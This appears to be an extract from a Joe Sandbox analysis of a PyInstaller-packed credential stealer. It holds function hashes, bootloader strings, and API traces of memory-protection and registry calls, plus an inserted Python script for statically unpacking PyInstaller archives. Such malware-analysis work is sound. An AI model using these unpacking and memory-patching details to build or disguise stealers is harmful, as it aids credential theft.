• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
• Instruction ID: 7ae02c9638ca6b5856d96e9c4271dc4d881285ea44c1e04e6b5846c68a01a61f
• Opcode Fuzzy Hash: 35d1efe4857f8844a1db8c4c8ed7dc734db620b0767d36ab5b03d26aefcb1554
• Instruction Fuzzy Hash: A621D232309741CAE7718F5BA84466EB7A4FB84F80F584929DF9943B94EF34C8518B00

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _fread_nolock$Message
• String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
• API String ID: 677216364-1384898525
• Opcode ID: 3993bc85ff956f219f6070cd6128d1ded84467a5356abd9fec022793e9654e66
• Instruction ID: 7988fca4b0f6ee0aa291819cf41753e6953f9551a20a04bb45a4accfa527e6ce
• Opcode Fuzzy Hash: 3993bc85ff956f219f6070cd6128d1ded84467a5356abd9fec022793e9654e66
• Instruction Fuzzy Hash: A6516971A0974286EB34DF28E5951B873E0EF48F88F5181B6DA0DCB7A5DE2CEA44C704

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
• Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
• Instruction ID: f31248d575e6ba4f98f790ba6f84a048c95880145c134868733e6c2382d3d428
• Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
• Instruction Fuzzy Hash: 6051F336618BA186D6389F36A4181BAB7E1FB98B65F004122EBDE83694DF3CD445DB10

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Message
• String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
• API String ID: 2030045667-3659356012
• Opcode ID: bf0fddbb6d8c69d18284353368b1d405461daf32cb687c8142f9a085ed163b8f
• Instruction ID: 21f2d2816fdf7cbef9e5b2a176c0a0476fe0f70f9ec9261e16c36fcddbe290cd
• Opcode Fuzzy Hash: bf0fddbb6d8c69d18284353368b1d405461daf32cb687c8142f9a085ed163b8f
• Instruction Fuzzy Hash: 89317F21B0875286EB30EF12E5415FAA3D1EB05FD4F484472DE4D8BAA5EE7CEA498300
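The strings in the functions above (the MEI cookie, the TOC, fseek/fread on the archive, "Failed to extract %s") belong to the archive reader of the PyInstaller bootloader, which is what marks this sample as a PyInstaller-packed Python stealer. The script below is an added example, not part of the Joe Sandbox report and not PyInstaller's own code: it walks the same structures the bootloader does, finding the cookie at the end of the file, reading the table of contents and inflating a compressed entry, so an analyst can list what such a sample embeds without running it. The archive it parses is a fixture constructed inline by build_archive(); the entry names, the payloads and the 311/python311.dll cookie fields are invented, while the cookie and TOC layouts are those PyInstaller 2.1 and later write.

```python
"""Walk a PyInstaller onefile archive as the bootloader does: find the MEI
cookie at the end of the file, read the TOC, inflate compressed entries."""
import struct
import zlib

# Cookie magic; the "MEI" prefix is the constant visible in the bootloader strings.
MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# PyInstaller >= 2.1 cookie: magic, archive length, TOC offset, TOC length,
# Python version, Python shared-library name (88 bytes, big-endian).
# The older 24-byte cookie of PyInstaller < 2.1 is not handled here.
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)
# TOC entry header: entry length, data offset (relative to archive start),
# compressed length, uncompressed length, compression flag, type code;
# the NUL-padded entry name follows the header.
ENTRY_FMT = "!iIIIBc"
ENTRY_HDR = struct.calcsize(ENTRY_FMT)


def find_cookie(data: bytes) -> int:
    """Offset of the cookie. Search from the end: the bootloader code itself
    carries MAGIC as a constant, so the first hit from the front is a decoy."""
    pos = data.rfind(MAGIC)
    if pos < 0:
        raise ValueError("no PyInstaller cookie found")
    return pos


def parse_archive(data: bytes) -> dict:
    """Return the cookie fields and the TOC entries of a PyInstaller archive."""
    cookie_pos = find_cookie(data)
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(
        COOKIE_FMT, data, cookie_pos)
    # The archive ends with the cookie; bytes after it (an appended Authenticode
    # signature, for instance) are not part of it, so anchor on cookie_pos.
    pkg_start = cookie_pos + COOKIE_SIZE - pkg_len
    if pkg_start < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("cookie describes an archive that does not fit the file")
    entries, cur = [], pkg_start + toc_off
    end = cur + toc_len
    while cur < end:
        entry_len, dpos, clen, ulen, flag, typ = struct.unpack_from(ENTRY_FMT, data, cur)
        if entry_len <= ENTRY_HDR or cur + entry_len > end:
            raise ValueError("corrupt TOC entry at offset %#x" % cur)
        name = data[cur + ENTRY_HDR:cur + entry_len].rstrip(b"\x00")
        entries.append({"name": name.decode("utf-8", "replace"), "type": typ.decode(),
                        "offset": pkg_start + dpos, "clen": clen, "ulen": ulen,
                        "compressed": bool(flag)})
        cur += entry_len
    return {"pyver": pyver, "pylib": pylib.rstrip(b"\x00").decode(), "entries": entries}


def extract_entry(data: bytes, entry: dict) -> bytes:
    """Read one entry's payload, inflating it when the TOC marks it compressed."""
    raw = data[entry["offset"]:entry["offset"] + entry["clen"]]
    out = zlib.decompress(raw) if entry["compressed"] else raw
    if len(out) != entry["ulen"]:
        raise ValueError("size mismatch for entry %s" % entry["name"])
    return out


def list_scripts(data: bytes) -> list:
    """Names of type 's' entries: the entry-point scripts the bootloader runs,
    which for a Python stealer is where its own code lives."""
    return [e["name"] for e in parse_archive(data)["entries"] if e["type"] == "s"]


def build_archive(files, pyver=311, pylib=b"python311.dll") -> bytes:
    """Constructed fixture: a fake PE stub (which also contains MAGIC, like a
    real bootloader) followed by an archive laid out as PyInstaller writes it."""
    stub = b"MZ" + b"\x00" * 30 + MAGIC + b"\x00" * 24
    blobs, toc, dpos = [], [], 0
    for name, typ, payload, compress in files:
        blob = zlib.compress(payload, 9) if compress else payload
        nm = name.encode() + b"\x00"                    # NUL-terminated name,
        nm += b"\x00" * (-(ENTRY_HDR + len(nm)) % 16)   # entry padded to 16 bytes
        toc.append(struct.pack(ENTRY_FMT, ENTRY_HDR + len(nm), dpos, len(blob),
                               len(payload), int(compress), typ.encode()) + nm)
        blobs.append(blob)
        dpos += len(blob)
    toc_bytes = b"".join(toc)
    pkg_len = dpos + len(toc_bytes) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, dpos, len(toc_bytes), pyver, pylib)
    return stub + b"".join(blobs) + toc_bytes + cookie


# Invented entry names and payloads; the layout, not the content, is the point.
SAMPLE = build_archive([
    ("pyi-python-flag", "o", b"", False),
    ("stealer_main", "s", b"import os\nprint('hi')\n", True),
    ("PYZ-00.pyz", "z", b"PYZ\x00" + b"\x00" * 60, False),
])

if __name__ == "__main__":
    info = parse_archive(SAMPLE)
    print("Python %d, %s" % (info["pyver"], info["pylib"]))
    for e in info["entries"]:
        print(e["type"], e["name"], e["clen"], "->", e["ulen"],
              "zlib" if e["compressed"] else "stored")
    print(extract_entry(SAMPLE, info["entries"][1]).decode())
```

On a real sample, read the executable into memory and pass the bytes to parse_archive(). Entries of type 's' are the scripts the bootloader executes and are the first thing to pull out of a stealer; entries of type 'z' are the PYZ archive of compiled modules, which has its own format and is not parsed here.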

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Message
• String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                            • API String ID: 2030045667-2813020118
                                                                                                                                                            • Opcode ID: f97452dd21fd68945824e535ab0dcf4460ea7f6a2e6be1a6213f334e5e25e01b
                                                                                                                                                            • Instruction ID: bcda495ceb30ac458ef12f31480d1d72b2449a15a63fd95dcf8090f1a414b292
                                                                                                                                                            • Opcode Fuzzy Hash: f97452dd21fd68945824e535ab0dcf4460ea7f6a2e6be1a6213f334e5e25e01b
                                                                                                                                                            • Instruction Fuzzy Hash: B051AF22B0978285EB30DB15E8417FA62D5FB84F94F444176DE4ECB7A5EE3CEA498700

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: e6e9ca765fa647dc4aa1628c0431ca1bf8d8f0a3c5e0b7675abe670f7d6e3383
• Instruction ID: 37896a5498843eb80ef82efb5c5c90a278b3208ad27dfb8db9a6b33ba3efabbb
• Opcode Fuzzy Hash: e6e9ca765fa647dc4aa1628c0431ca1bf8d8f0a3c5e0b7675abe670f7d6e3383
• Instruction Fuzzy Hash: CDC1E122A1CA8791EB71CB1594402BD3BE9EB80F84F5941B1DE4E8B391DE7CEE45E310

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: 1f76bd5378032364c0c66ec421b8ba12abb822c28e20eaaac5cd2e33ebbb1b20
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: 6311827530AB4086EF249FA9E50825A6660FF44F85F540934DF8D07B94EF3DC515CB04

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction ID: a0ef61eaca6f478601609124bd3b8dffd40535fde0eea172761b3dee05fbbc9d
• Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction Fuzzy Hash: BAD18D76209B8885DB70DF4AE49835A77A0F788B84F100956EACD47BA5EF7CC561CF40

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
• String ID: Unhandled exception in script
• API String ID: 3081866767-2699770090
• Opcode ID: 267098d25035b94134717001de08b9299095ffdd58f7f8dc022cf584bdac5a0d
• Instruction ID: da05d12b5e6610342280c981c3614d81ade5baa9daad2b6454da0cb9062ecfc4
• Opcode Fuzzy Hash: 267098d25035b94134717001de08b9299095ffdd58f7f8dc022cf584bdac5a0d
• Instruction Fuzzy Hash: 04314E76A09A8289EB34DF21E9551F973A4FF88B84F440176EA4D8BB95DF3CDA05C700

Control-flow Graph
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                            • Instruction ID: feac1331536a9838e329a67258f1869d86310d0ff4494a2a8ad06da83b29fabf
                                                                                                                                                            • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                            • Instruction Fuzzy Hash: 1F02AB3621EB848AEB60CF99E49475AB7A0F7C4794F104915EA8E47BA8EF7CC455CF00
APIs
• GetModuleFileNameW.KERNEL32(?,00007FF6957E39CA), ref: 00007FF6957E3F34
  • Part of subcall function 00007FF6957E29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
  • Part of subcall function 00007FF6957E29C0: MessageBoxW.USER32 ref: 00007FF6957E2AD0
Strings
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: ErrorFileLastMessageModuleName
• String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
• API String ID: 2581892565-1977442011
• Opcode ID: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
• Instruction ID: 8376dbd94e06a60e52e5221bf3d7b344e45b39ef527dec3484ffc0156379225a
• Opcode Fuzzy Hash: 7ef307d93855c796adb502a26685baad3249a75f128fd8c4618b636fbd62cd4f
• Instruction Fuzzy Hash: 4C116061B1974341FA719721E8153FA52E4EF48BC5F8004B2E84ECA6A9EE1CEF498710
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: 426be33b010e02d3cd41f92f04ebae3f0422e1fced414359e9086f992fe8f504
• Instruction ID: e6663f71ca957a6ee549669d9392d68df70acd5007b7682ec2b1c3eb6e4886c0
• Opcode Fuzzy Hash: 426be33b010e02d3cd41f92f04ebae3f0422e1fced414359e9086f992fe8f504
• Instruction Fuzzy Hash: 1141B262D1878293E764CB20D5403B967E0FF94B64F109375EA9C8BAD1DF7CAAE09700
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode ID: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
• Instruction ID: 71d4d5400b0ec71d6a2b5328aae7264f3d545339b01560599d068771d2ab6e24
• Opcode Fuzzy Hash: c8ffd58409c2a817e2eafc26a907e7367a815fa90807bfabd45e1aee5e5800ec
• Instruction Fuzzy Hash: FD11CC21E1865242F7649B69F5482FD52D1EF85FC0F448071DA498BBE9CD7CDDC94700
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
• String ID:
• API String ID: 3251591375-0
• Opcode ID: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
• Instruction ID: dfd300ae97f88bd05353b2d25524d34931358b545ccca6bda5ddab92ecd8e3dc
• Opcode Fuzzy Hash: 9d2a249925c3744b7bdec991b642967cea5aa1e4eae3f82ffa02bbb969e0fbb5
• Instruction Fuzzy Hash: 6B313929E0931341FA74AB65A5563F926D5EF42F84F5410B5EA0ECF2E3DE2CAE098340
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Virtual$AllocQuery
• String ID:
• API String ID: 31662377-0
• Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
• Instruction ID: a875eccf4cbca2122ac52142e2ba099ab4ec564258f79b6d4129b99f8a2d9bee
• Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
• Instruction Fuzzy Hash: ED31D13221EA8489EE719E9DE05935A66A4FB88B84F200D35A5CD46FD8EF7DC5608F04
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction ID: e33c0a8993a9d0a092934029623b3c3f4d343e03eddcd33c65ea6f6b7e8c180d
• Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction Fuzzy Hash: 1F112A7161F6808AFF709FE9A90D3992294AF54B55F604D359B4E81FE1FF78C0688E40
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
Similarity
• API ID: CacheCurrentFlushInstructionProcessProtectVirtual
• String ID:
• API String ID: 3733156554-0
• Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
• Instruction ID: 6fa53c38ba1ab4b18213726b367b1918ac0280b598fe87874ece9360d7f0c7cd
• Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
• Instruction Fuzzy Hash: 55F01D3621DA04C4DA319F49E44835AABA0EB887E4F144911BA8D03FA9DE38C6A18F00
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
• Instruction ID: 38d088cf905d6aa0255940bb24d75c3f276c4fdf9ed3a1cfc31d7d7ddc91c339
• Opcode Fuzzy Hash: a9ca9fd944998b9103efb0079ab816177775b60747cbceda43ee2d2e97830e0f
• Instruction Fuzzy Hash: 7DD06C10F1971246EA29AF7069991B96291DF48F51F1054B9CC0A8A393CEACAD4AD341
APIs
Memory Dump Source
• Source File: 00000003.00000002.2711227093.00000271DC640000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000271DC640000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_271dc640000_cstealer.jbxd
Similarity
• API ID: AllocLibraryLoadVirtual
• String ID:
• API String ID: 3550616410-0
• Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction ID: 1cf17eec2f5a536843fb37b1809d21efc8b0b267d875d33db62adc1f0fe90885
• Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
• Instruction Fuzzy Hash: 5961E472B0E6908FDB658FDA904472DB393FB54B94F688525DE5D07788DA34D862CB00
APIs
Memory Dump Source
• Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
• Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
  • Part of subcall function 00000271DC671628: GetProcessHeap.KERNEL32 ref: 00000271DC671633
  • Part of subcall function 00000271DC671628: HeapAlloc.KERNEL32 ref: 00000271DC671642
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC6716B2
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC6716DF
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6716F9
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671719
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC671734
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671754
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC67176F
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC67178F
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6717AA
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC6717CA
• Sleep.KERNEL32 ref: 00000271DC671AD7
• SleepEx.KERNEL32 ref: 00000271DC671ADD
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC6717E5
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671805
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC671820
  • Part of subcall function 00000271DC671628: RegOpenKeyExW.ADVAPI32 ref: 00000271DC671840
  • Part of subcall function 00000271DC671628: RegCloseKey.ADVAPI32 ref: 00000271DC67185B
